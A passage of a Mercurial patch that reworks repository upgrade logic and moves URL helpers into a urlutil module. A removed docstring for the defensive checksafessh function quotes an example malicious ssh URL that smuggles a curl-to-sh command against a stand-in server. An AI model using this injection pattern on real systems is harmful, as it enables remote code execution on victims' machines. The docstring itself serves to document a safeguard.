+ if not rl_type & store.FILEFLAGS_REVLOG_MAIN: continue - rl = _revlogfrompath(srcrepo, unencoded) + rl = _revlogfrompath(srcrepo, rl_type, unencoded) info = rl.storageinfo( exclusivefiles=True, @@ -210,19 +216,19 @@ srcrawsize += rawsize # This is for the separate progress bars. 
- if isinstance(rl, changelog.changelog): - changelogs[unencoded] = rl + if rl_type & store.FILEFLAGS_CHANGELOG: + changelogs[unencoded] = (rl_type, rl) crevcount += len(rl) csrcsize += datasize crawsize += rawsize - elif isinstance(rl, manifest.manifestrevlog): - manifests[unencoded] = rl + elif rl_type & store.FILEFLAGS_MANIFESTLOG: + manifests[unencoded] = (rl_type, rl) mcount += 1 mrevcount += len(rl) msrcsize += datasize mrawsize += rawsize - elif isinstance(rl, filelog.filelog): - filelogs[unencoded] = rl + elif rl_type & store.FILEFLAGS_FILELOG: + filelogs[unencoded] = (rl_type, rl) fcount += 1 frevcount += len(rl) fsrcsize += datasize @@ -267,12 +273,13 @@ ) ) progress = srcrepo.ui.makeprogress(_(b'file revisions'), total=frevcount) - for unencoded, oldrl in sorted(filelogs.items()): + for unencoded, (rl_type, oldrl) in sorted(filelogs.items()): newrl = _perform_clone( ui, dstrepo, tr, oldrl, + rl_type, unencoded, upgrade_op, sidedatacompanion, @@ -306,12 +313,13 @@ progress = srcrepo.ui.makeprogress( _(b'manifest revisions'), total=mrevcount ) - for unencoded, oldrl in sorted(manifests.items()): + for unencoded, (rl_type, oldrl) in sorted(manifests.items()): newrl = _perform_clone( ui, dstrepo, tr, oldrl, + rl_type, unencoded, upgrade_op, sidedatacompanion, @@ -344,12 +352,13 @@ progress = srcrepo.ui.makeprogress( _(b'changelog revisions'), total=crevcount ) - for unencoded, oldrl in sorted(changelogs.items()): + for unencoded, (rl_type, oldrl) in sorted(changelogs.items()): newrl = _perform_clone( ui, dstrepo, tr, oldrl, + rl_type, unencoded, upgrade_op, sidedatacompanion, @@ -381,7 +390,7 @@ are cloned""" for path, kind, st in sorted(srcrepo.store.vfs.readdir(b'', stat=True)): # don't copy revlogs as they are already cloned - if path.endswith((b'.i', b'.d', b'.n', b'.nd')): + if store.revlog_type(path) is not None: continue # Skip transaction related files. 
if path.startswith(b'undo'): @@ -412,7 +421,10 @@ """ # TODO: don't blindly rename everything in store # There can be upgrades where store is not touched at all - util.rename(currentrepo.spath, backupvfs.join(b'store')) + if upgrade_op.backup_store: + util.rename(currentrepo.spath, backupvfs.join(b'store')) + else: + currentrepo.vfs.rmtree(b'store', forcibly=True) util.rename(upgradedrepo.spath, currentrepo.spath) @@ -436,6 +448,8 @@ """ assert srcrepo.currentwlock() assert dstrepo.currentwlock() + backuppath = None + backupvfs = None ui.status( _( @@ -444,79 +458,136 @@ ) ) - with dstrepo.transaction(b'upgrade') as tr: - _clonerevlogs( - ui, - srcrepo, - dstrepo, - tr, - upgrade_op, + if upgrade_op.requirements_only: + ui.status(_(b'upgrading repository requirements\n')) + scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements) + # if there is only one action and that is persistent nodemap upgrade + # directly write the nodemap file and update requirements instead of going + # through the whole cloning process + elif ( + len(upgrade_op.upgrade_actions) == 1 + and b'persistent-nodemap' in upgrade_op._upgrade_actions_names + and not upgrade_op.removed_actions + ): + ui.status( + _(b'upgrading repository to use persistent nodemap feature\n') + ) + with srcrepo.transaction(b'upgrade') as tr: + unfi = srcrepo.unfiltered() + cl = unfi.changelog + nodemap.persist_nodemap(tr, cl, force=True) + # we want to directly operate on the underlying revlog to force + # create a nodemap file. 
This is fine since this is upgrade code + # and it heavily relies on repository being revlog based + # hence accessing private attributes can be justified + nodemap.persist_nodemap( + tr, unfi.manifestlog._rootstore._revlog, force=True + ) + scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements) + elif ( + len(upgrade_op.removed_actions) == 1 + and [ + x + for x in upgrade_op.removed_actions + if x.name == b'persistent-nodemap' + ] + and not upgrade_op.upgrade_actions + ): + ui.status( + _(b'downgrading repository to not use persistent nodemap feature\n') + ) + with srcrepo.transaction(b'upgrade') as tr: + unfi = srcrepo.unfiltered() + cl = unfi.changelog + nodemap.delete_nodemap(tr, srcrepo, cl) + # check comment 20 lines above for accessing private attributes + nodemap.delete_nodemap( + tr, srcrepo, unfi.manifestlog._rootstore._revlog + ) + scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements) + else: + with dstrepo.transaction(b'upgrade') as tr: + _clonerevlogs( + ui, + srcrepo, + dstrepo, + tr, + upgrade_op, + ) + + # Now copy other files in the store directory. + for p in _files_to_copy_post_revlog_clone(srcrepo): + srcrepo.ui.status(_(b'copying %s\n') % p) + src = srcrepo.store.rawvfs.join(p) + dst = dstrepo.store.rawvfs.join(p) + util.copyfile(src, dst, copystat=True) + + finishdatamigration(ui, srcrepo, dstrepo, requirements) + + ui.status(_(b'data fully upgraded in a temporary repository\n')) + + if upgrade_op.backup_store: + backuppath = pycompat.mkdtemp( + prefix=b'upgradebackup.', dir=srcrepo.path + ) + backupvfs = vfsmod.vfs(backuppath) + + # Make a backup of requires file first, as it is the first to be modified. + util.copyfile( + srcrepo.vfs.join(b'requires'), backupvfs.join(b'requires') + ) + + # We install an arbitrary requirement that clients must not support + # as a mechanism to lock out new clients during the data swap. 
This is + # better than allowing a client to continue while the repository is in + # an inconsistent state. + ui.status( + _( + b'marking source repository as being upgraded; clients will be ' + b'unable to read from repository\n' + ) + ) + scmutil.writereporequirements( + srcrepo, srcrepo.requirements | {b'upgradeinprogress'} ) - # Now copy other files in the store directory. - for p in _files_to_copy_post_revlog_clone(srcrepo): - srcrepo.ui.status(_(b'copying %s\n') % p) - src = srcrepo.store.rawvfs.join(p) - dst = dstrepo.store.rawvfs.join(p) - util.copyfile(src, dst, copystat=True) - - finishdatamigration(ui, srcrepo, dstrepo, requirements) - - ui.status(_(b'data fully upgraded in a temporary repository\n')) - - backuppath = pycompat.mkdtemp(prefix=b'upgradebackup.', dir=srcrepo.path) - backupvfs = vfsmod.vfs(backuppath) - - # Make a backup of requires file first, as it is the first to be modified. - util.copyfile(srcrepo.vfs.join(b'requires'), backupvfs.join(b'requires')) - - # We install an arbitrary requirement that clients must not support - # as a mechanism to lock out new clients during the data swap. This is - # better than allowing a client to continue while the repository is in - # an inconsistent state. - ui.status( - _( - b'marking source repository as being upgraded; clients will be ' - b'unable to read from repository\n' - ) - ) - scmutil.writereporequirements( - srcrepo, srcrepo.requirements | {b'upgradeinprogress'} - ) + ui.status(_(b'starting in-place swap of repository data\n')) + if upgrade_op.backup_store: + ui.status( + _(b'replaced files will be backed up at %s\n') % backuppath + ) - ui.status(_(b'starting in-place swap of repository data\n')) - ui.status(_(b'replaced files will be backed up at %s\n') % backuppath) - - # Now swap in the new store directory. Doing it as a rename should make - # the operation nearly instantaneous and atomic (at least in well-behaved - # environments). 
- ui.status(_(b'replacing store...\n')) - tstart = util.timer() - _replacestores(srcrepo, dstrepo, backupvfs, upgrade_op) - elapsed = util.timer() - tstart - ui.status( - _( - b'store replacement complete; repository was inconsistent for ' - b'%0.1fs\n' + # Now swap in the new store directory. Doing it as a rename should make + # the operation nearly instantaneous and atomic (at least in well-behaved + # environments). + ui.status(_(b'replacing store...\n')) + tstart = util.timer() + _replacestores(srcrepo, dstrepo, backupvfs, upgrade_op) + elapsed = util.timer() - tstart + ui.status( + _( + b'store replacement complete; repository was inconsistent for ' + b'%0.1fs\n' + ) + % elapsed ) - % elapsed - ) - # We first write the requirements file. Any new requirements will lock - # out legacy clients. - ui.status( - _( - b'finalizing requirements file and making repository readable ' - b'again\n' + # We first write the requirements file. Any new requirements will lock + # out legacy clients. + ui.status( + _( + b'finalizing requirements file and making repository readable ' + b'again\n' + ) ) - ) - scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements) + scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements) - # The lock file from the old store won't be removed because nothing has a - # reference to its new location. So clean it up manually. Alternatively, we - # could update srcrepo.svfs and other variables to point to the new - # location. This is simpler. - assert backupvfs is not None # help pytype - backupvfs.unlink(b'store/lock') + if upgrade_op.backup_store: + # The lock file from the old store won't be removed because nothing has a + # reference to its new location. So clean it up manually. Alternatively, we + # could update srcrepo.svfs and other variables to point to the new + # location. This is simpler. 
+ assert backupvfs is not None # help pytype + backupvfs.unlink(b'store/lock') return backuppath diff --git a/mercurial/url.py b/mercurial/url.py --- a/mercurial/url.py +++ b/mercurial/url.py @@ -1,6 +1,6 @@ # url.py - HTTP handling for mercurial # -# Copyright 2005, 2006, 2007, 2008 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006, 2007, 2008 Olivia Mackall <olivia@selenic.com> # Copyright 2006, 2007 Alexis S. L. Carvalho <alexis@cecm.usp.br> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # @@ -26,7 +26,10 @@ urllibcompat, util, ) -from .utils import stringutil +from .utils import ( + stringutil, + urlutil, +) httplib = util.httplib stringio = util.stringio @@ -75,17 +78,17 @@ user, passwd = auth.get(b'username'), auth.get(b'password') self.ui.debug(b"using auth.%s.* for authentication\n" % group) if not user or not passwd: - u = util.url(pycompat.bytesurl(authuri)) + u = urlutil.url(pycompat.bytesurl(authuri)) u.query = None if not self.ui.interactive(): raise error.Abort( _(b'http authorization required for %s') - % util.hidepassword(bytes(u)) + % urlutil.hidepassword(bytes(u)) ) self.ui.write( _(b"http authorization required for %s\n") - % util.hidepassword(bytes(u)) + % urlutil.hidepassword(bytes(u)) ) self.ui.write(_(b"realm: %s\n") % pycompat.bytesurl(realm)) if user: @@ -128,7 +131,7 @@ proxyurl.startswith(b'http:') or proxyurl.startswith(b'https:') ): proxyurl = b'http://' + proxyurl + b'/' - proxy = util.url(proxyurl) + proxy = urlutil.url(proxyurl) if not proxy.user: proxy.user = ui.config(b"http_proxy", b"user") proxy.passwd = ui.config(b"http_proxy", b"passwd") @@ -155,7 +158,9 @@ # expects them to be. 
proxyurl = str(proxy) proxies = {'http': proxyurl, 'https': proxyurl} - ui.debug(b'proxying through %s\n' % util.hidepassword(bytes(proxy))) + ui.debug( + b'proxying through %s\n' % urlutil.hidepassword(bytes(proxy)) + ) else: proxies = {} @@ -219,7 +224,7 @@ new_tunnel = False if new_tunnel or tunnel_host == urllibcompat.getfullurl(req): # has proxy - u = util.url(pycompat.bytesurl(tunnel_host)) + u = urlutil.url(pycompat.bytesurl(tunnel_host)) if new_tunnel or u.scheme == b'https': # only use CONNECT for HTTPS h.realhostport = b':'.join([u.host, (u.port or b'443')]) h.headers = req.headers.copy() @@ -675,7 +680,7 @@ def open(ui, url_, data=None, sendaccept=True): - u = util.url(url_) + u = urlutil.url(url_) if u.scheme: u.scheme = u.scheme.lower() url_, authinfo = u.authinfo() diff --git a/mercurial/util.py b/mercurial/util.py --- a/mercurial/util.py +++ b/mercurial/util.py @@ -1,7 +1,7 @@ # util.py - Mercurial utility functions and platform specific implementations # # Copyright 2005 K. Thananchayan <thananck@yahoo.com> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # # This software may be used and distributed according to the terms of the @@ -28,7 +28,6 @@ import platform as pyplatform import re as remod import shutil -import socket import stat import sys import time @@ -57,8 +56,18 @@ hashutil, procutil, stringutil, + urlutil, ) +if pycompat.TYPE_CHECKING: + from typing import ( + Iterator, + List, + Optional, + Tuple, + ) + + base85 = policy.importmod('base85') osutil = policy.importmod('osutil') @@ -133,6 +142,7 @@ def setumask(val): + # type: (int) -> None ''' updates the umask. 
used by chg server ''' if pycompat.iswindows: return @@ -307,7 +317,7 @@ try: - buffer = buffer + buffer = buffer # pytype: disable=name-error except NameError: def buffer(sliceable, offset=0, length=None): @@ -1254,7 +1264,8 @@ """call this before writes, return self or a copied new object""" if getattr(self, '_copied', 0): self._copied -= 1 - return self.__class__(self) + # Function cow.__init__ expects 1 arg(s), got 2 [wrong-arg-count] + return self.__class__(self) # pytype: disable=wrong-arg-count return self def copy(self): @@ -1285,11 +1296,13 @@ if pycompat.ispypy: # __setitem__() isn't called as of PyPy 5.8.0 - def update(self, src): + def update(self, src, **f): if isinstance(src, dict): src = pycompat.iteritems(src) for k, v in src: self[k] = v + for k in f: + self[k] = f[k] def insert(self, position, key, value): for (i, (k, v)) in enumerate(list(self.items())): @@ -1395,8 +1408,8 @@ __slots__ = ('next', 'prev', 'key', 'value', 'cost') def __init__(self): - self.next = None - self.prev = None + self.next = self + self.prev = self self.key = _notset self.value = None @@ -1435,9 +1448,7 @@ def __init__(self, max, maxcost=0): self._cache = {} - self._head = head = _lrucachenode() - head.prev = head - head.next = head + self._head = _lrucachenode() self._size = 1 self.capacity = max self.totalcost = 0 @@ -1542,6 +1553,7 @@ """ try: node = self._cache[k] + assert node is not None # help pytype return node.value except KeyError: if default is _notset: @@ -1599,6 +1611,9 @@ # Walk the linked list backwards starting at tail node until we hit # a non-empty node. n = self._head.prev + + assert n is not None # help pytype + while n.key is _notset: n = n.prev @@ -1833,6 +1848,7 @@ def pathto(root, n1, n2): + # type: (bytes, bytes, bytes) -> bytes """return the relative path from one place to another. 
root should use os.sep to separate directories n1 should use os.sep to separate directories @@ -2017,6 +2033,7 @@ def checkwinfilename(path): + # type: (bytes) -> Optional[bytes] r"""Check that the base-relative path is a valid filename on Windows. Returns None if the path is ok, or a UI string describing the problem. @@ -2111,6 +2128,7 @@ def readlock(pathname): + # type: (bytes) -> bytes try: return readlink(pathname) except OSError as why: @@ -2134,6 +2152,7 @@ def fscasesensitive(path): + # type: (bytes) -> bool """ Return true if the given path is on a case-sensitive filesystem @@ -2170,10 +2189,11 @@ def _checkre2(self): global _re2 global _re2_input + + check_pattern = br'\[([^\[]+)\]' + check_input = b'[ui]' try: # check if match works, see issue3964 - check_pattern = br'\[([^\[]+)\]' - check_input = b'[ui]' _re2 = bool(re2.match(check_pattern, check_input)) except ImportError: _re2 = False @@ -2226,6 +2246,7 @@ def fspath(name, root): + # type: (bytes, bytes) -> bytes """Get name in the case stored in the filesystem The name should be relative to root, and be normcase-ed for efficiency. @@ -2270,6 +2291,7 @@ def checknlink(testfile): + # type: (bytes) -> bool '''check whether hardlink count reporting works properly''' # testfile may be open, so we need a separate file for checking to @@ -2303,8 +2325,9 @@ def endswithsep(path): + # type: (bytes) -> bool '''Check path ends with os.sep or os.altsep.''' - return ( + return bool( # help pytype path.endswith(pycompat.ossep) or pycompat.osaltsep and path.endswith(pycompat.osaltsep) @@ -2312,6 +2335,7 @@ def splitpath(path): + # type: (bytes) -> List[bytes] """Split path by os.sep. Note that this function does not use os.altsep because this is an alternative of simple "xxx.split(os.sep)". 
@@ -2540,6 +2564,7 @@ def unlinkpath(f, ignoremissing=False, rmdir=True): + # type: (bytes, bool, bool) -> None """unlink and remove the directory if it is empty""" if ignoremissing: tryunlink(f) @@ -2554,6 +2579,7 @@ def tryunlink(f): + # type: (bytes) -> None """Attempt to remove a file, ignoring ENOENT errors.""" try: unlink(f) @@ -2563,6 +2589,7 @@ def makedirs(name, mode=None, notindexed=False): + # type: (bytes, Optional[int], bool) -> None """recursive directory creation with parent mode inheritance Newly created directories are marked as "not to be indexed by @@ -2592,16 +2619,19 @@ def readfile(path): + # type: (bytes) -> bytes with open(path, b'rb') as fp: return fp.read() def writefile(path, text): + # type: (bytes, bytes) -> None with open(path, b'wb') as fp: fp.write(text) def appendfile(path, text): + # type: (bytes, bytes) -> None with open(path, b'ab') as fp: fp.write(text) @@ -2763,6 +2793,7 @@ def processlinerange(fromline, toline): + # type: (int, int) -> Tuple[int, int] """Check that linerange <fromline>:<toline> makes sense and return a 0-based range. @@ -2822,10 +2853,12 @@ def tolf(s): + # type: (bytes) -> bytes return _eolre.sub(b'\n', s) def tocrlf(s): + # type: (bytes) -> bytes return _eolre.sub(b'\r\n', s) @@ -2889,12 +2922,14 @@ def iterlines(iterator): + # type: (Iterator[bytes]) -> Iterator[bytes] for chunk in iterator: for line in chunk.splitlines(): yield line def expandpath(path): + # type: (bytes) -> bytes return os.path.expanduser(os.path.expandvars(path)) @@ -2924,396 +2959,52 @@ return r.sub(lambda x: fn(mapping[x.group()[1:]]), s) -def getport(port): - """Return the port for a given network service. - - If port is an integer, it's returned as is. If it's a string, it's - looked up using socket.getservbyname(). If there's no matching - service, error.Abort is raised. 
- """ - try: - return int(port) - except ValueError: - pass - - try: - return socket.getservbyname(pycompat.sysstr(port)) - except socket.error: - raise error.Abort( - _(b"no port number associated with service '%s'") % port - ) - - -class url(object): - r"""Reliable URL parser. - - This parses URLs and provides attributes for the following - components: - - <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment> - - Missing components are set to None. The only exception is - fragment, which is set to '' if present but empty. - - If parsefragment is False, fragment is included in query. If - parsequery is False, query is included in path. If both are - False, both fragment and query are included in path. - - See http://www.ietf.org/rfc/rfc2396.txt for more information. - - Note that for backward compatibility reasons, bundle URLs do not - take host names. That means 'bundle://../' has a path of '../'. - - Examples: - - >>> url(b'http://www.ietf.org/rfc/rfc2396.txt') - <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'> - >>> url(b'ssh://[::1]:2200//home/joe/repo') - <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'> - >>> url(b'file:///home/joe/repo') - <url scheme: 'file', path: '/home/joe/repo'> - >>> url(b'file:///c:/temp/foo/') - <url scheme: 'file', path: 'c:/temp/foo/'> - >>> url(b'bundle:foo') - <url scheme: 'bundle', path: 'foo'> - >>> url(b'bundle://../foo') - <url scheme: 'bundle', path: '../foo'> - >>> url(br'c:\foo\bar') - <url path: 'c:\\foo\\bar'> - >>> url(br'\\blah\blah\blah') - <url path: '\\\\blah\\blah\\blah'> - >>> url(br'\\blah\blah\blah#baz') - <url path: '\\\\blah\\blah\\blah', fragment: 'baz'> - >>> url(br'file:///C:\users\me') - <url scheme: 'file', path: 'C:\\users\\me'> - - Authentication credentials: - - >>> url(b'ssh://joe:xyz@x/repo') - <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'> - >>> url(b'ssh://joe@x/repo') - <url scheme: 'ssh', user: 'joe', host: 'x', 
path: 'repo'> - - Query strings and fragments: - - >>> url(b'http://host/a?b#c') - <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'> - >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False) - <url scheme: 'http', host: 'host', path: 'a?b#c'> - - Empty path: - - >>> url(b'') - <url path: ''> - >>> url(b'#a') - <url path: '', fragment: 'a'> - >>> url(b'http://host/') - <url scheme: 'http', host: 'host', path: ''> - >>> url(b'http://host/#a') - <url scheme: 'http', host: 'host', path: '', fragment: 'a'> - - Only scheme: - - >>> url(b'http:') - <url scheme: 'http'> - """ - - _safechars = b"!~*'()+" - _safepchars = b"/!~*'()+:\\" - _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match - - def __init__(self, path, parsequery=True, parsefragment=True): - # We slowly chomp away at path until we have only the path left - self.scheme = self.user = self.passwd = self.host = None - self.port = self.path = self.query = self.fragment = None - self._localpath = True - self._hostport = b'' - self._origpath = path - - if parsefragment and b'#' in path: - path, self.fragment = path.split(b'#', 1) - - # special case for Windows drive letters and UNC paths - if hasdriveletter(path) or path.startswith(b'\\\\'): - self.path = path - return - - # For compatibility reasons, we can't handle bundle paths as - # normal URLS - if path.startswith(b'bundle:'): - self.scheme = b'bundle' - path = path[7:] - if path.startswith(b'//'): - path = path[2:] - self.path = path - return - - if self._matchscheme(path): - parts = path.split(b':', 1) - if parts[0]: - self.scheme, path = parts - self._localpath = False - - if not path: - path = None - if self._localpath: - self.path = b'' - return - else: - if self._localpath: - self.path = path - return - - if parsequery and b'?' 
in path: - path, self.query = path.split(b'?', 1) - if not path: - path = None - if not self.query: - self.query = None - - # // is required to specify a host/authority - if path and path.startswith(b'//'): - parts = path[2:].split(b'/', 1) - if len(parts) > 1: - self.host, path = parts - else: - self.host = parts[0] - path = None - if not self.host: - self.host = None - # path of file:///d is /d - # path of file:///d:/ is d:/, not /d:/ - if path and not hasdriveletter(path): - path = b'/' + path - - if self.host and b'@' in self.host: - self.user, self.host = self.host.rsplit(b'@', 1) - if b':' in self.user: - self.user, self.passwd = self.user.split(b':', 1) - if not self.host: - self.host = None - - # Don't split on colons in IPv6 addresses without ports - if ( - self.host - and b':' in self.host - and not ( - self.host.startswith(b'[') and self.host.endswith(b']') - ) - ): - self._hostport = self.host - self.host, self.port = self.host.rsplit(b':', 1) - if not self.host: - self.host = None - - if ( - self.host - and self.scheme == b'file' - and self.host not in (b'localhost', b'127.0.0.1', b'[::1]') - ): - raise error.Abort( - _(b'file:// URLs can only refer to localhost') - ) - - self.path = path - - # leave the query string escaped - for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'): - v = getattr(self, a) - if v is not None: - setattr(self, a, urlreq.unquote(v)) - - @encoding.strmethod - def __repr__(self): - attrs = [] - for a in ( - b'scheme', - b'user', - b'passwd', - b'host', - b'port', - b'path', - b'query', - b'fragment', - ): - v = getattr(self, a) - if v is not None: - attrs.append(b'%s: %r' % (a, pycompat.bytestr(v))) - return b'<url %s>' % b', '.join(attrs) - - def __bytes__(self): - r"""Join the URL's components back into a URL string. 
- - Examples: - - >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar')) - 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar' - >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42')) - 'http://user:pw@host:80/?foo=bar&baz=42' - >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz')) - 'http://user:pw@host:80/?foo=bar%3dbaz' - >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#')) - 'ssh://user:pw@[::1]:2200//home/joe#' - >>> bytes(url(b'http://localhost:80//')) - 'http://localhost:80//' - >>> bytes(url(b'http://localhost:80/')) - 'http://localhost:80/' - >>> bytes(url(b'http://localhost:80')) - 'http://localhost:80/' - >>> bytes(url(b'bundle:foo')) - 'bundle:foo' - >>> bytes(url(b'bundle://../foo')) - 'bundle:../foo' - >>> bytes(url(b'path')) - 'path' - >>> bytes(url(b'file:///tmp/foo/bar')) - 'file:///tmp/foo/bar' - >>> bytes(url(b'file:///c:/tmp/foo/bar')) - 'file:///c:/tmp/foo/bar' - >>> print(url(br'bundle:foo\bar')) - bundle:foo\bar - >>> print(url(br'file:///D:\data\hg')) - file:///D:\data\hg - """ - if self._localpath: - s = self.path - if self.scheme == b'bundle': - s = b'bundle:' + s - if self.fragment: - s += b'#' + self.fragment - return s - - s = self.scheme + b':' - if self.user or self.passwd or self.host: - s += b'//' - elif self.scheme and ( - not self.path - or self.path.startswith(b'/') - or hasdriveletter(self.path) - ): - s += b'//' - if hasdriveletter(self.path): - s += b'/' - if self.user: - s += urlreq.quote(self.user, safe=self._safechars) - if self.passwd: - s += b':' + urlreq.quote(self.passwd, safe=self._safechars) - if self.user or self.passwd: - s += b'@' - if self.host: - if not (self.host.startswith(b'[') and self.host.endswith(b']')): - s += urlreq.quote(self.host) - else: - s += self.host - if self.port: - s += b':' + urlreq.quote(self.port) - if self.host: - s += b'/' - if self.path: - # TODO: similar to the query string, we should not unescape the - # path when we store it, the path might contain '%2f' = '/', - # which we 
should *not* escape. - s += urlreq.quote(self.path, safe=self._safepchars) - if self.query: - # we store the query in escaped form. - s += b'?' + self.query - if self.fragment is not None: - s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars) - return s - - __str__ = encoding.strmethod(__bytes__) - - def authinfo(self): - user, passwd = self.user, self.passwd - try: - self.user, self.passwd = None, None - s = bytes(self) - finally: - self.user, self.passwd = user, passwd - if not self.user: - return (s, None) - # authinfo[1] is passed to urllib2 password manager, and its - # URIs must not contain credentials. The host is passed in the - # URIs list because Python < 2.4.3 uses only that to search for - # a password. - return (s, (None, (s, self.host), self.user, self.passwd or b'')) - - def isabs(self): - if self.scheme and self.scheme != b'file': - return True # remote URL - if hasdriveletter(self.path): - return True # absolute for our purposes - can't be joined() - if self.path.startswith(br'\\'): - return True # Windows UNC path - if self.path.startswith(b'/'): - return True # POSIX-style - return False - - def localpath(self): - if self.scheme == b'file' or self.scheme == b'bundle': - path = self.path or b'/' - # For Windows, we need to promote hosts containing drive - # letters to paths with drive letters. 
- if hasdriveletter(self._hostport): - path = self._hostport + b'/' + self.path - elif ( - self.host is not None and self.path and not hasdriveletter(path) - ): - path = b'/' + path - return path - return self._origpath - - def islocal(self): - '''whether localpath will return something that posixfile can open''' - return ( - not self.scheme - or self.scheme == b'file' - or self.scheme == b'bundle' - ) - - -def hasscheme(path): - return bool(url(path).scheme) - - -def hasdriveletter(path): - return path and path[1:2] == b':' and path[0:1].isalpha() - - -def urllocalpath(path): - return url(path, parsequery=False, parsefragment=False).localpath() - - -def checksafessh(path): - """check if a path / url is a potentially unsafe ssh exploit (SEC) - - This is a sanity check for ssh urls. ssh will parse the first item as - an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. - Let's prevent these potentially exploited urls entirely and warn the - user. - - Raises an error.Abort when the url is unsafe. - """ - path = urlreq.unquote(path) - if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'): - raise error.Abort( - _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),) - ) - - -def hidepassword(u): - '''hide user credential in a url string''' - u = url(u) - if u.passwd: - u.passwd = b'***' - return bytes(u) - - -def removeauth(u): - '''remove all authentication information from a url string''' - u = url(u) - u.user = u.passwd = None - return bytes(u) +def getport(*args, **kwargs): + msg = b'getport(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.getport(*args, **kwargs) + + +def url(*args, **kwargs): + msg = b'url(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.url(*args, **kwargs) + + +def hasscheme(*args, **kwargs): + msg = b'hasscheme(...) 
moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.hasscheme(*args, **kwargs) + + +def hasdriveletter(*args, **kwargs): + msg = b'hasdriveletter(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.hasdriveletter(*args, **kwargs) + + +def urllocalpath(*args, **kwargs): + msg = b'urllocalpath(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.urllocalpath(*args, **kwargs) + + +def checksafessh(*args, **kwargs): + msg = b'checksafessh(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.checksafessh(*args, **kwargs) + + +def hidepassword(*args, **kwargs): + msg = b'hidepassword(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.hidepassword(*args, **kwargs) + + +def removeauth(*args, **kwargs): + msg = b'removeauth(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.removeauth(*args, **kwargs) timecount = unitcountfn( @@ -3415,6 +3106,7 @@ def sizetoint(s): + # type: (bytes) -> int """Convert a space specifier to a byte count. >>> sizetoint(b'30') @@ -3640,6 +3332,7 @@ def _estimatememory(): + # type: () -> Optional[int] """Provide an estimate for the available system memory in Bytes. If no estimate can be provided on the platform, returns None. @@ -3647,7 +3340,12 @@ if pycompat.sysplatform.startswith(b'win'): # On Windows, use the GlobalMemoryStatusEx kernel function directly. 
from ctypes import c_long as DWORD, c_ulonglong as DWORDLONG - from ctypes.wintypes import Structure, byref, sizeof, windll + from ctypes.wintypes import ( # pytype: disable=import-error + Structure, + byref, + sizeof, + windll, + ) class MEMORYSTATUSEX(Structure): _fields_ = [ diff --git a/mercurial/utils/compression.py b/mercurial/utils/compression.py --- a/mercurial/utils/compression.py +++ b/mercurial/utils/compression.py @@ -685,9 +685,11 @@ # while providing no worse compression. It strikes a good balance # between speed and compression. level = opts.get(b'level', 3) + # default to single-threaded compression + threads = opts.get(b'threads', 0) zstd = self._module - z = zstd.ZstdCompressor(level=level).compressobj() + z = zstd.ZstdCompressor(level=level, threads=threads).compressobj() for chunk in it: data = z.compress(chunk) if data: diff --git a/mercurial/utils/dateutil.py b/mercurial/utils/dateutil.py --- a/mercurial/utils/dateutil.py +++ b/mercurial/utils/dateutil.py @@ -18,6 +18,18 @@ pycompat, ) +if pycompat.TYPE_CHECKING: + from typing import ( + Callable, + Dict, + Iterable, + Optional, + Tuple, + Union, + ) + + hgdate = Tuple[float, int] # (unixtime, offset) + # used by parsedate defaultdateformats = ( b'%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601 @@ -62,13 +74,16 @@ def makedate(timestamp=None): + # type: (Optional[float]) -> hgdate """Return a unix timestamp (or the current time) as a (unixtime, offset) tuple based off the local timezone.""" if timestamp is None: timestamp = time.time() if timestamp < 0: hint = _(b"check your clock") - raise error.Abort(_(b"negative timestamp: %d") % timestamp, hint=hint) + raise error.InputError( + _(b"negative timestamp: %d") % timestamp, hint=hint + ) delta = datetime.datetime.utcfromtimestamp( timestamp ) - datetime.datetime.fromtimestamp(timestamp) @@ -77,6 +92,7 @@ def datestr(date=None, format=b'%a %b %d %H:%M:%S %Y %1%2'): + # type: (Optional[hgdate], bytes) -> bytes """represent a (unixtime, offset) tuple as 
